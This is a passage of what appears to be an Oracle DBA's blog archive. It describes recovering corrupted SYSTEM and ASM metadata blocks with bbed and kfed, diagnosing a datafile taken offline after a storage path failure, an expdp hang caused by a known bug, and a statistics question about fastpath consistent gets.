tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 2
tab 1, row 3, @0x1ccd
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 4
tab 1, row 4, @0x1c45
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 5
tab 1, row 5, @0x1bc0
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 6
tab 1, row 6, @0x1b35
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 7
tab 2, row 0, @0x160
tl: 48 fb: -CH-FL-- lb: 0x0  cc: 19 cki: 3
col  0: [ 2]  c1 1e
col  1: [ 1]  80
.....
col 17: *NULL*
col 18: [ 1]  80
tab 3, row 0, @0x1ad0
.....

At this point I wondered whether bbed could repair these two blocks first and let the database come up. The repair, briefly:
block 51 is an index block and trivial to fix, so I will not go into it; block 26 belongs to a cluster table and is a good deal more involved. After committing the open ITL entry and clearing the lock flags, verify still complained:

BBED> verify
DBVERIFY - Verification starting
FILE = /u01/fix/SYSTEM_OLD.dbf
BLOCK = 26

Block Checking: DBA = 4194330, Block Type = KTB-managed data block
data header at 0x105d485c
kdbchk:  key comref count wrong
         keyslot=7
Block 26 failed with check code 6121

DBVERIFY - Verification complete

Total Blocks Examined         : 1
Total Blocks Processed (Data) : 1
Total Blocks Failing   (Data) : 1
Total Blocks Processed (Index): 0
Total Blocks Failing   (Index): 0
Total Blocks Empty            : 0
Total Blocks Marked Corrupt   : 0
Total Blocks Influx           : 0

Next we fix the cluster's kdbr entries (one kdbr shown here as an example):

BBED> p *kdbr[7]
rowdata[7568]
-------------
ub1 rowdata[7568]                           @8012     0xac

BBED> x /rcccccc
rowdata[7568]                               @8012
-------------
flag@8012: 0xac (KDRHFL, KDRHFF, KDRHFH, KDRHFK)
lock@8013: 0x00
cols@8014:    1
kref@8015:   31
mref@8017:   30
hrid@8019:0x0040001b.0
nrid@8025:0x0040001b.0

BBED> modify /x 1f offset 8017
 File: /u01/fix/SYSTEM_OLD.dbf (1)
 Block: 26               Offsets: 8017 to 8020           Dba:0x0040001a
------------------------------------------------------------------------
 1f000040 

 <32 bytes per line

BBED> verify
DBVERIFY - Verification starting
FILE = /u01/fix/SYSTEM_OLD.dbf
BLOCK = 26

Block Checking: DBA = 4194330, Block Type = KTB-managed data block
data header at 0x105d485c
kdbchk: space available on commit is incorrect
        tosp=987 fsc=0 stb=0 avsp=32
Block 26 failed with check code 6111

DBVERIFY - Verification complete

Total Blocks Examined         : 1
Total Blocks Processed (Data) : 1
Total Blocks Failing   (Data) : 1
Total Blocks Processed (Index): 0
Total Blocks Failing   (Index): 0
Total Blocks Empty            : 0
Total Blocks Marked Corrupt   : 0
Total Blocks Influx           : 0

BBED> p kdbh
struct kdbh, 14 bytes                       @92
   ub1 kdbhflag                             @92       0x00 (NONE)
   b1 kdbhntab                              @93       6
   b2 kdbhnrow                              @94       141
   sb2 kdbhfrre                             @96      -1
   sb2 kdbhfsbo                             @98       320
   sb2 kdbhfseo                             @100      352
   b2 kdbhavsp                              @102      32
   b2 kdbhtosp                              @104      987

BBED> d /v offset 104 count 2
 File: /u01/fix/SYSTEM_OLD.dbf (1)
 Block: 26      Offsets:  104 to  105  Dba:0x0040001a
-------------------------------------------------------
 db03                                l ..

 <16 bytes per line>

BBED> modify /x 2000 offset 104
 File: /u01/fix/SYSTEM_OLD.dbf (1)
 Block: 26               Offsets:  104 to  105           Dba:0x0040001a
------------------------------------------------------------------------
 2000 

 <32 bytes per line>

BBED> sum apply
Check value for File 1, Block 26:
current = 0x87ce, required = 0x87ce
BBED> verify
DBVERIFY - Verification starting
FILE = /u01/fix/SYSTEM_OLD.dbf
BLOCK = 26

DBVERIFY - Verification complete

Total Blocks Examined         : 1
Total Blocks Processed (Data) : 1
Total Blocks Failing   (Data) : 0
Total Blocks Processed (Index): 0
Total Blocks Failing   (Index): 0
Total Blocks Empty            : 0
Total Blocks Marked Corrupt   : 0
Total Blocks Influx           : 0

After these few simple edits, verify no longer reported any error; opening the database again, however, raised a different one:

Errors in file /u01/app/oracle/admin/orcl/udump/orcl1_ora_18955.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [kdoirp-3], [139], [0], [], [], [], [], []

From the error, the bootstrap initialization is still failing, and a 10046 trace shows it is the same few blocks.
Recall that the earlier dump of this block showed several rows flagged as deleted, e.g.: tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 0
So could we simply undo those deletes, i.e. use bbed to restore the 7 deleted row pieces?
Because this is a cluster table block the edits are fiddlier, but after trying it the error was still exactly the same.
What does [kdoirp-3] mean? Here is how Oracle documents the row-layer opcodes:

Layer 11:  KCOCODRW -  Row
opcode 1 :  KDOIUR  - interpret undo redo
opcode 2 :  KDOIRP  - insert row  piece
opcode 3 :  KDODRP  - drop row piece
opcode 4 :  KDOLKR  - lock row  piece
opcode 5 :  KDOURP  - update row piece
opcode 6 :  KDOORP  - overwrite row piece
opcode 7 :  KDOMFC  - manipulate first column
opcode 8 :  KDOCFA  - change forwarding address
opcode 9 :  KDOCKI  - change cluster key index
opcode 10 :  KDOSKL  - set key links
opcode 11 :  KDOQMI  - quick multi-insert (ex. insert as select...)
opcode 12 :  KDOQMD  - quick multi-delete
opcode 13 :  KDOTBF  - toggle block header flags

Clearly this means insert row piece. So simply patching those two blocks is not enough to get past the problem. Further dumps showed _next_object was involved as well, which complicated things even more.
I believe a few more rounds of patching would have cracked it, but it was getting tedious. By that time, though, the SYSTEM datafile restored from an earlier backup was ready, so I used bbed to swap the affected blocks in from it, then fixed the resetlogs information, recreated the controlfile and ran recovery.
The database opened without a hitch. A final check of the alert log still showed SMON failing to roll back one transaction. How do we clean that up properly?
Dump the undo segment header, identify the objects touched by that transaction, then mask the rollback segment with the parameter mentioned earlier and rebuild the undo tablespace.
Here is the information obtained from the undo header dump:
For the objects involved, since transactional consistency has been broken, the advice is to analyze the tables and rebuild their indexes.
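
A sketch of that clean-up flow (the rollback segment name is a placeholder):

SQL> select segment_name, status from dba_rollback_segs where status = 'NEEDS RECOVERY';
SQL> alter system dump undo header '_SYSSMU8$';
-- identify the affected objects from the dump, mask the segment with
-- _offline_rollback_segments in the pfile, then create a new undo
-- tablespace, switch to it and drop the old one.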

Related posts:

  1. 一次远程协助的恢复 遇到异灵事件
  2. 一次TB级ERP(ASM RAC)库的恢复
  3. ora-00600 kccpb_sanity_check_2和kclchkblk_4的恢复case
  4. sysaux大面积坏块的例子
  5. Deep in ora-00600 [4193]

datafile auto offline due to i/o error


I had just arrived at the hotel when a customer called to say that one datafile of a database was reporting I/O errors. Checking over VPN showed the following:

Sun Oct 30 23:19:27 BEIST 2016
Trace dumping is performing id=[cdmp_20161030231927]
Sun Oct 30 23:19:27 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/bdump/xxxx2_smon_11863216.trc:
ORA-00376: file 595 cannot be read at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
Sun Oct 30 23:19:31 BEIST 2016
ORACLE Instance xxxx2 (pid = 22) - Error 376 encountered while recovering transaction (160, 1).
Sun Oct 30 23:19:31 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/bdump/xxxx2_smon_11863216.trc:
ORA-00376: file 595 cannot be read at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
Sun Oct 30 23:19:32 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/bdump/xxxx2_smon_11863216.trc:
ORA-00376: file 595 cannot be read at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
Sun Oct 30 23:19:33 BEIST 2016

Clearly the file cannot be read. In fact, logging on to both nodes and checking with ls -tr showed the permissions were correct, and a dbv check of the file found no corrupt blocks either, so I concluded a straight recover of the datafile would be enough. During the recover, though, it complained that the NFS mount options were wrong:

SQL> recover datafile 595;
ORA-00279: change 15125505612642 generated at 10/30/2016 18:06:07 needed for thread 1
ORA-00289: suggestion : /arch2/1_108445_815539661.dbf
ORA-00280: change 15125505612642 for thread 1 is in sequence #108445

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
/arch1/1_108445_815539661.dbf
ORA-00308: cannot open archived log '/arch1/1_108445_815539661.dbf'
ORA-27054: NFS file system where the file is created or resides is not mounted with correct options
Additional information: 6

Evidently this environment has more than one problem. Since the local node could not read that NFS archive location, and the goal was to restore service quickly, I simply copied the needed archived logs into the local archive directory and ran the recover again, after which the file came online successfully:

Sun Oct 30 23:20:23 BEIST 2016
alter database datafile 595 online
Sun Oct 30 23:20:23 BEIST 2016
Completed: alter database datafile 595 online
Sun Oct 30 23:20:28 BEIST 2016
SMON: Parallel transaction recovery tried
Sun Oct 30 23:23:02 BEIST 2016
Thread 2 advanced to log sequence 164113 (LGWR switch)
  Current log# 7 seq# 164113 mem# 0: /dev/rora_redo2_01

The file did come online, and fortunately the database is running in archivelog mode. So why did this happen in the first place? Searching further back in the alert log shows I/O errors starting at 18:15 that afternoon:

Sun Oct 30 18:15:04 BEIST 2016
KCF: write/open error block=0x29790 online=1
     file=595 /dev/rdata05vg_8g_48
     error=27063 txt: 'IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: -1
Additional information: 131072'
Automatic datafile offline due to write error on
file 595: /dev/rdata05vg_8g_48
Sun Oct 30 18:15:28 BEIST 2016
Thread 2 advanced to log sequence 164100 (LGWR switch)
  Current log# 12 seq# 164100 mem# 0: /dev/rora_redo2_06
Sun Oct 30 18:15:28 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/udump/xxxx2_ora_28705020.trc:
ORA-00372: file 595 cannot be modified at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
ORA-00372: file 595 cannot be modified at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'

We can see that after the write error Oracle took the datafile offline automatically; this is one of the database's protection mechanisms (there is no hidden parameter to control it here). At this point I suspected something had gone wrong at the OS level, and sure enough errpt showed a path failure at 18:15.

oracle:xxx$(/oracle)errpt
IDENTIFIER TIMESTAMP  T C RESOURCE_NAME  DESCRIPTION
3D32B80D   1030181516 P S topsvcs        NIM thread blocked
3D32B80D   1030181516 P S topsvcs        NIM thread blocked
E86653C3   1030181516 P H LVDD           I/O ERROR DETECTED BY LVM
B6267342   1030181516 P H hdisk46        DISK OPERATION ERROR
DE3B8540   1030181516 P H hdisk46        PATH HAS FAILED
DE3B8540   1030181416 P H hdisk46        PATH HAS FAILED

oracle:xxxx$(/oracle/app/10.2/admin/xxxx/bdump)errpt -aj DE3B8540
---------------------------------------------------------------------------
LABEL:          SC_DISK_ERR7
IDENTIFIER:     DE3B8540

Date/Time:       Sun Oct 30 18:15:00 BEIST 2016
Sequence Number: 921
Machine Id:      00F7A4904C00
Node Id:         sti50l02
Class:           H
Type:            PERM
WPAR:            Global
Resource Name:   hdisk46
Resource Class:  disk
Resource Type:   Hitachi
......
......

Description
PATH HAS FAILED

Probable Causes
ADAPTER HARDWARE OR CABLE
DASD DEVICE

Failure Causes
UNDETERMINED

        Recommended Actions
        PERFORM PROBLEM DETERMINATION PROCEDURES
        CHECK PATH

Detail Data
PATH ID

So the path failure that afternoon caused the database I/O errors, and Oracle took the file offline automatically. When I checked just now, lspath showed every path healthy, which is as it should be; otherwise recover datafile would still have been throwing I/O errors. It's late, so I'll stop here; just a quick note!

 

PS:

1) NFS mount options reference

Sun Solaris *
  Binaries ##:             rw,bg,hard,nointr,rsize=32768,wsize=32768,proto=tcp,noac,vers=3,suid
  Oracle Datafiles:        rw,bg,hard,nointr,rsize=32768,wsize=32768,proto=tcp,noac,forcedirectio,vers=3
  CRS Voting Disk and OCR: rw,bg,hard,nointr,rsize=32768,wsize=32768,proto=tcp,vers=3,noac,forcedirectio

AIX (5L) **
  Binaries ##:             rw,bg,hard,nointr,rsize=32768,wsize=32768,proto=tcp,vers=3,timeo=600
  Oracle Datafiles:        cio,rw,bg,hard,nointr,rsize=32768,wsize=32768,proto=tcp,noac,vers=3,timeo=600
  CRS Voting Disk and OCR: cio,rw,bg,hard,intr,rsize=32768,wsize=32768,tcp,noac,vers=3,timeo=600

HPUX 11.23 ***
  Binaries ##:             rw,bg,vers=3,proto=tcp,noac,hard,nointr,timeo=600,rsize=32768,wsize=32768,suid
  Oracle Datafiles:        rw,bg,vers=3,proto=tcp,noac,forcedirectio,hard,nointr,timeo=600,rsize=32768,wsize=32768
  CRS Voting Disk and OCR: rw,bg,vers=3,proto=tcp,noac,forcedirectio,hard,nointr,timeo=600,rsize=32768,wsize=32768

Windows
  Not Supported (binaries, datafiles, CRS voting disk and OCR)

Linux x86 # ****
  Binaries ##:             rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,vers=3,timeo=600,actimeo=0
  Oracle Datafiles:        rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,actimeo=0,vers=3,timeo=600
  CRS Voting Disk and OCR: rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,noac,actimeo=0,vers=3,timeo=600

Linux x86-64 # ****
  Binaries ##:             rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,vers=3,timeo=600,actimeo=0
  Oracle Datafiles:        rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,actimeo=0,vers=3,timeo=600
  CRS Voting Disk and OCR: rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,noac,vers=3,timeo=600,actimeo=0

Linux Itanium
  Binaries ##:             rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,vers=3,timeo=600,actimeo=0
  Oracle Datafiles:        rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,actimeo=0,vers=3,timeo=600
  CRS Voting Disk and OCR: rw,bg,hard,nointr,rsize=32768,wsize=32768,tcp,noac,vers=3,timeo=600,actimeo=0

* NFS mount option “forcedirectio” is required on Solaris platforms when mounting the OCR/CRS files when using Oracle 10.1.0.4 or 10.2.0.2 or later (Oracle unpublished bug 4466428)
** AIX is only supported with NAS on AIX 5.3 TL04 and higher with Oracle 10.2.0.1 and later
*** NAS devices are only supported with HPUX 11.23 or higher ONLY
# These mount options are for Linux kernels 2.6 and above. For older kernels please check Note 279393.1

## The stated mount options for binaries are applicable only if the ORACLE HOME is shared.

Due to Unpublished bug 5856342, it is necessary to use the following init.ora parameter when using NAS with all versions of RAC on Linux (x86 & X86-64 platforms) until 10.2.0.4. This bug is fixed and included in 10.2.0.4 patchset.
filesystemio_options = DIRECTIO

 

2) From Oracle 11.2.0.2 onward, without Patch 7691270 installed, Oracle will automatically crash the instance after a datafile write error instead of just offlining the file; the behavior is tied to the hidden parameter _datafile_write_errors_crash_instance.

This parameter defaults to TRUE from 11.2.0.2 onward, up to and including the latest 11.2.0.4.
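
If the older offline-instead-of-crash behavior is preferred, the parameter can be turned off explicitly (a judgment call, and only after weighing the risk of running with a file silently offline):

SQL> alter system set "_datafile_write_errors_crash_instance"=false scope=spfile sid='*';
-- takes effect after an instance restart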

Enter value for par: datafile_write
old   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%&par%'
new   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%datafile_write%'

NAME                                               VALUE                DESCRIB
-------------------------------------------------- -------------------- ------------------------------------------------------------
_datafile_write_errors_crash_instance              TRUE                 datafile write errors crash instance

Related posts:

  1. win 环境 O/S-Error: (OS 23) 数据错误(循环冗余检查) —恢复
  2. Archivelog 模式下,datafile header损坏,如何恢复?
  3. datafile 也能跨resetlogs ?
  4. 11.2.0.4 RAC CRS diskgroup auto dismount问题

Recover Case: a 24 TB RAC (ASM) recovery


A few days ago a customer's core database, a RAC of roughly 24 TB, could not mount its ASM diskgroup. Analysis showed that one block on one of the disks was corrupt, and a kfed read confirmed it:

$ kfed read /dev/rdisk/disk392 aun=0 blkn=2 | more
kfbh.endian:                         76 ; 0x000: 0x4c
kfbh.hard:                           86 ; 0x001: 0x56
kfbh.type:                           77 ; 0x002: *** Unknown Enum ***
kfbh.datfmt:                         82 ; 0x003: 0x52
kfbh.block.blk:              1162031153 ; 0x004: blk=1162031153
kfbh.block.obj:               620095014 ; 0x008: file=386598
kfbh.check:                  1426510413 ; 0x00c: 0x5506d24d
kfbh.fcn.base:                        0 ; 0x010: 0x00000000
kfbh.fcn.wrap:                        0 ; 0x014: 0x00000000
kfbh.spare1:                  524288639 ; 0x018: 0x1f40027f
kfbh.spare2:                          0 ; 0x01c: 0x00000000
60000000000F3200 4C564D52 45433031 24F5E626 5506D24D  [LVMREC01$..&U..M]
60000000000F3210 00000000 00000000 1F40027F 00000000  [.........@......]

We built a replacement block by hand and merged it back in, but when I tried to mount the diskgroup it still failed, as follows:

Fri Oct 28 04:47:56 2016
WARNING: cache read  a corrupt block: group=3(DATA) dsk=49 blk=18 disk=49 (DATA_0049) incarn=3636812057 au=0 blk=18 count=1
Errors in file /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_arb0_21799.trc:
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
NOTE: a corrupted block from group DATA was dumped to /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_arb0_21799.trc
WARNING: cache read (retry) a corrupt block: group=3(DATA) dsk=49 blk=18 disk=49 (DATA_0049) incarn=3636812057 au=0 blk=18 count=1
Errors in file /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_arb0_21799.trc:
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
ERROR: cache failed to read group=3(DATA) dsk=49 blk=18 from disk(s): 49(DATA_0049)
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
NOTE: cache initiating offline of disk 49 group DATA
NOTE: process _arb0_+asm1 (21799) initiating offline of disk 49.3636812057 (DATA_0049) with mask 0x7e in group 3
WARNING: Disk 49 (DATA_0049) in group 3 in mode 0x7f is now being taken offline on ASM inst 1
NOTE: initiating PST update: grp = 3, dsk = 49/0xd8c55919, mask = 0x6a, op = clear
Fri Oct 28 04:47:56 2016
GMON updating disk modes for group 3 at 23 for pid 25, osid 21799
ERROR: Disk 49 cannot be offlined, since diskgroup has external redundancy.
ERROR: too many offline disks in PST (grp 3)
WARNING: Offline of disk 49 (DATA_0049) in group 3 and mode 0x7f failed on ASM inst 1
Fri Oct 28 04:47:56 2016
NOTE: halting all I/Os to diskgroup 3 (DATA)
Fri Oct 28 04:47:56 2016
NOTE: cache dismounting (not clean) group 3/0x51B5A89F (DATA)
NOTE: messaging CKPT to quiesce pins Unix process pid: 23376, image: oracle@cqracdb1 (B000)
Fri Oct 28 04:47:56 2016
ERROR: ORA-15130 in COD recovery for diskgroup 3/0x51b5a89f (DATA)
ERROR: ORA-15130 thrown in RBAL for group number 3
Errors in file /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_rbal_6465.trc:
ORA-15130: diskgroup "DATA" is being dismounted

This error looks familiar by now. The log says block 18 of AU 0 on disk 49 is also bad, which a kfed read confirmed, just like block 2 earlier. Applying the same recipe, we built an identical block and merged it in, and this time the diskgroup mounted successfully.
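
For reference, the repair loop looks roughly like this with kfed (device, AU and block numbers follow the first block in this post; the dump file name is arbitrary):

kfed read /dev/rdisk/disk392 aun=0 blkn=3 text=good_block.txt    # dump a healthy block of the same type as a template
vi good_block.txt                                                # adjust kfbh.block.blk etc. to match the damaged block
kfed merge /dev/rdisk/disk392 aun=0 blkn=2 text=good_block.txt   # write the repaired block back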

SQL> alter system set asm_power_limit=0 scope=both;

System altered.

SQL> alter diskgroup data mount;

Diskgroup altered.

将diskgroup mount之后,我检查数据库,发现crs自动将数据库拉起来了,并且已经open了。然而后续进一步检查发现asm的arb进程仍然在报错:

ARB0 relocating file +DATA.278.794162479 (120 entries)
DDE: Problem Key 'ORA 600 [kfdAuDealloc2]' was flood controlled (0x2) (incident: 1486148)
ORA-00600: internal error code, arguments: [kfdAuDealloc2],85], [278], [14309 [], [], [], [], [], [], [], [], []
OSM metadata struct dump of kfdatb:
kfdatb.aunum:                      7168 ; 0x000: 0x00001c00
kfdatb.shrink:                      448 ; 0x004: 0x01c0
kfdatb.ub2pad:                     7176 ; 0x006: 0x1c08
kfdatb.auinfo[0].link.next:           8 ; 0x008: 0x0008
kfdatb.auinfo[0].link.prev:           8 ; 0x00a: 0x0008
kfdatb.auinfo[1].link.next:          12 ; 0x00c: 0x000c
kfdatb.auinfo[1].link.prev:          12 ; 0x00e: 0x000c
kfdatb.auinfo[2].link.next:          16 ; 0x010: 0x0010
kfdatb.auinfo[2].link.prev:          16 ; 0x012: 0x0010
kfdatb.auinfo[3].link.next:          20 ; 0x014: 0x0014
kfdatb.auinfo[3].link.prev:          20 ; 0x016: 0x0014
kfdatb.auinfo[4].link.next:          24 ; 0x018: 0x0018
kfdatb.auinfo[4].link.prev:          24 ; 0x01a: 0x0018
kfdatb.auinfo[5].link.next:          28 ; 0x01c: 0x001c
kfdatb.auinfo[5].link.prev:          28 ; 0x01e: 0x001c
kfdatb.auinfo[6].link.next:          32 ; 0x020: 0x0020
kfdatb.auinfo[6].link.prev:          32 ; 0x022: 0x0020
kfdatb.spare:                         0 ; 0x024: 0x00000000
Dump of ate#:0
OSM metadata struct dump of kfdate:
kfdate.discriminator:                 1 ; 0x000: 0x00000001
kfdate.allo.lo:                       0 ; 0x000: XNUM=0x0
kfdate.allo.hi:                 8388608 ; 0x004: V=1 I=0 H=0 FNUM=0x0

Although this no longer affected normal database operation, the ARB process errors meant the rebalance never actually completed: the customer's newly added disks were barely used and space usage across the diskgroup stayed unbalanced.

The error looks complicated but is actually simple. From the numbers in the arguments we can tell that, at bottom, the two blocks we hand-built earlier are incomplete. They are allocation table blocks, and the kfdate entries that follow also have to be rebuilt before ARB can work properly.

Xiong is already changing the ODU code to deal with this leftover issue, so it looks as though ODU will soon be able to repair ASM metadata as well. Impressive!

Related posts:

  1. Where is the backup of ASM disk header block? –补充
  2. Oracle 11g asm中不同au size下datafile的au分布初探
  3. oracle asm 剖析系列(2)–pst/fst/allocator tabe
  4. oracle asm 剖析系列(4) –file directory
  5. One recover case!

xtts expdp hung at initial stages


Last Saturday a telecom customer migrated and upgraded their OSS database cross-platform from AIX to Linux; the version change was minor, from 11.2.0.3 to 11.2.0.4. The partner vendor had run three rehearsals and reportedly hit no major problems.

During the actual cutover, however, the metadata export hung: expdp sat there for tens of minutes with no response at all. In the end we bypassed it by running impdp directly on the target database over a database link.
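
A sketch of that workaround on the target side (database link, directory, tablespace and datafile names are all placeholders):

impdp system/*** network_link=SOURCE_DB_LINK \
      transport_tablespaces=OSS_DATA \
      transport_datafiles='/u01/oradata/oss_data01.dbf' \
      directory=DP_DIR logfile=xtts_imp.log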

Investigation confirmed it was Oracle Bug 16318046 : TTS EXPORT STUCK AT INITIAL STAGES. The bug is described as follows:

Bug 16318046 : TTS EXPORT STUCK AT INITIAL STAGES	

Bug attributes

Type: B - Defect
Severity: 2 - Severe Loss of Service
Status: 36 - Duplicate Bug. To Filer
Created: 2013-2-13
Updated: 2016-8-5
Product version: 11.2.0.3
Database version: 11.2.0.3
Platform: 226 - Linux x86-64
Platform version: NO DATA
Base bug: 13717234
Affected platforms: Generic
Product source: Oracle

Related products

Product line: Oracle Database Products
Family: Oracle Database Suite
Area: Oracle Database
Product: 5 - Oracle Database - Enterprise Edition

Hdr: 16318046 11.2.0.3 RDBMS 11.2.0.3 DATA PUMP EXP PRODID-5 PORTID-226 13717234
Abstract: TTS EXPORT STUCK AT INITIAL STAGES

*** 02/12/13 10:36 am ***

PROBLEM:
--------

expdp "'/ as sysdba'" parfile=auexpxtts.dat
;;;
Export: Release 11.2.0.3.0 - Production on Wed Jan 23 23:00:14 2013

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.
;;;
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 -
64bit Production
With the Partitioning and Oracle Label Security options
Starting "SYS"."SYS_EXPORT_TRANSPORTABLE_01":  "/******** AS SYSDBA"
parfile=auexpxtts.dat

DIAGNOSTIC ANALYSIS:
--------------------
SQL ID: bjf05cwcj5s6p
Plan Hash: 0
BEGIN :1 := sys.kupc$que_int.receive(:2); END;

call     count       cpu    elapsed       disk      query    current
rows
------- ------  -------- ---------- ---------- ---------- ----------
----------
Parse    16229      1.79       2.17          0          0          0
 0
Execute  16228     45.18   81114.46          0      65309          0
26
Fetch        0      0.00       0.00          0          0          0
 0
------- ------  -------- ---------- ---------- ---------- ----------
----------
total    32457     46.98   81116.63          0      65309          0
26

Misses in library cache during parse: 1
Misses in library cache during execute: 1
Optimizer mode: ALL_ROWS
Parsing user id: SYS   (recursive depth: 2)

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  wait for unread message on broadcast channel
                                              81109        1.38      81058.42
  library cache: mutex X                          2        0.00          0.00
  library cache lock                              1        4.69          4.69
******************************************************************************
**

Trace file: P2PDB21_dm03_34603216.trc

SQL ID: bjf05cwcj5s6p
Plan Hash: 0
BEGIN :1 := sys.kupc$que_int.receive(:2); END;

call     count       cpu    elapsed       disk      query    current
rows
------- ------  -------- ---------- ---------- ---------- ----------
----------
Parse      140      0.01       0.01          0          0          0
 0
Execute    140      0.33     496.10          0       1656          0
70
Fetch        0      0.00       0.00          0          0          0
 0
------- ------  -------- ---------- ---------- ---------- ----------
----------
total      280      0.34     496.11          0       1656          0
70

Misses in library cache during parse: 0
Optimizer mode: ALL_ROWS
Parsing user id: SYS   (recursive depth: 2)

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  wait for unread message on broadcast channel
                                                519        1.12        495.72
******************************************************************************
**

Trace file: P2PDB21_dw00_37552328.trc

SQL ID: 82n5hj2hgrbdx
Plan Hash: 2296790768
SELECT  objnum
FROM
  (SELECT r, objnum FROM   (SELECT rownum r, o.obj# objnum    FROM  sys.obj$
  o, sys.tab$ t, sys.dba_xml_tab_cols x,  sys.user$ u    WHERE  t.ts# = :1
  AND t.obj# = o.obj# AND  o.name = x.table_name AND o.owner# = u.user# AND
  u.name = x.owner AND  (x.storage_type = 'BINARY') AND  NOT EXISTS (SELECT 1 

  FROM   sys.ku_noexp_tab noexp WHERE  noexp.obj_type =  'USER' AND
  noexp.name = u.name)) ) WHERE r = 1 

call     count       cpu    elapsed       disk      query    current
rows
------- ------  -------- ---------- ---------- ---------- ----------
----------
Parse        1      0.00       0.00          0          0          0
 0
Execute    436      0.12       0.14          0        680          0
 0
Fetch      435  75154.06   79676.07          1   56238520          0
 0
------- ------  -------- ---------- ---------- ---------- ----------
----------
total      872  75154.19   79676.21          1   56239200          0
 0

WORKAROUND:
-----------
use normal export but ct using EBS and required to use datapump.

RELATED BUGS:
-------------
Bug:13728919 

REPRODUCIBILITY:
----------------

TEST CASE:
----------

STACK TRACE:
------------

SUPPORTING INFORMATION:
-----------------------

24 HOUR CONTACT INFORMATION FOR P1 BUGS:
----------------------------------------

DIAL-IN INFORMATION:
--------------------

Recording this here so that anyone doing an XTTS cross-platform migration later is aware of this issue and does not fall into the same hole.

Related posts:

  1. soft parse 和 library cache lock
  2. library cache: mutex X引发的故障
  3. The cause of system hung is cursor: pin X ?
  4. XTTS(Cross Platform Incremental Backup)的测试例子
  5. expdp 报错ORA-7445 的一个问题展开

About consistent gets from cache (fastpath)


Compared with 10g, Oracle 11g brings many optimizer improvements that I will not list one by one here. While analyzing an operator customer's CRM system, I found logical reads running at roughly 1,000,000 per second, of which consistent gets accounted for about 900,000, which suggests a large optimization opportunity. But when I queried the statistics, something odd turned up:

SQL> l
  1  select b.name, a.value
  2    from v$sysstat a, v$statname b
  3   where a.STATISTIC# = b.STATISTIC#
  4*    and b.NAME like 'consistent gets%'
SQL> /

NAME                                                                            VALUE
-------------------------------------------------- ----------------------------------
consistent gets                                                         2919902517406
consistent gets from cache                                              2918741933811
consistent gets from cache (fastpath)                                               0
consistent gets - examination                                            947312709390
consistent gets direct                                                     1160585050

SQL> /

NAME                                                                            VALUE
-------------------------------------------------- ----------------------------------
consistent gets                                                         2919907774371
consistent gets from cache                                              2918747190826
consistent gets from cache (fastpath)                                               0
consistent gets - examination                                            947314388772
consistent gets direct                                                     1160585845

As you can see, consistent gets from cache (fastpath) is 0, which immediately struck me as odd. I had never paid much attention to this statistic before, but a value of 0 just did not feel right.

In fact, consistent gets from cache (fastpath) counts a new optimization that Oracle 11g applies to buffer pins; its purpose is to reduce latch contention, in particular contention on cache buffers chains.

First, let's look at the behavior in Oracle 10gR2:

www.killdb.com@create table t(
  2  n number,
  3  v varchar2(100),
  4  constraint pk_n primary key (n)); 

Table created.

www.killdb.com@insert into t
  2  select level, rpad('*', 100, '*')
  3   from dual
  4   connect by level <= 1000; 

1000 rows created.

www.killdb.com@create or replace procedure get_cg(
  2    p_cg out number,
  3    p_cg_c out number,
  4    p_cgfp out number,
  5    p_cg_ex out number,
  6    p_cg_dir out number
  7   ) is
  8   begin
  9    select max(case sn.NAME when 'consistent gets' then ms.value end),
 10    max(case sn.NAME when 'consistent gets from cache' then ms.value end),
 11      max(case sn.NAME when 'consistent gets from cache (fastpath)' then ms.value end),
 12      max(case sn.NAME when 'consistent gets - examination' then ms.value end),
 13      max(case sn.NAME when 'consistent gets direct' then ms.value end)
 14      into p_cg,p_cg_c, p_cgfp,p_cg_ex,p_cg_dir
 15     from v$mystat ms, v$statname sn
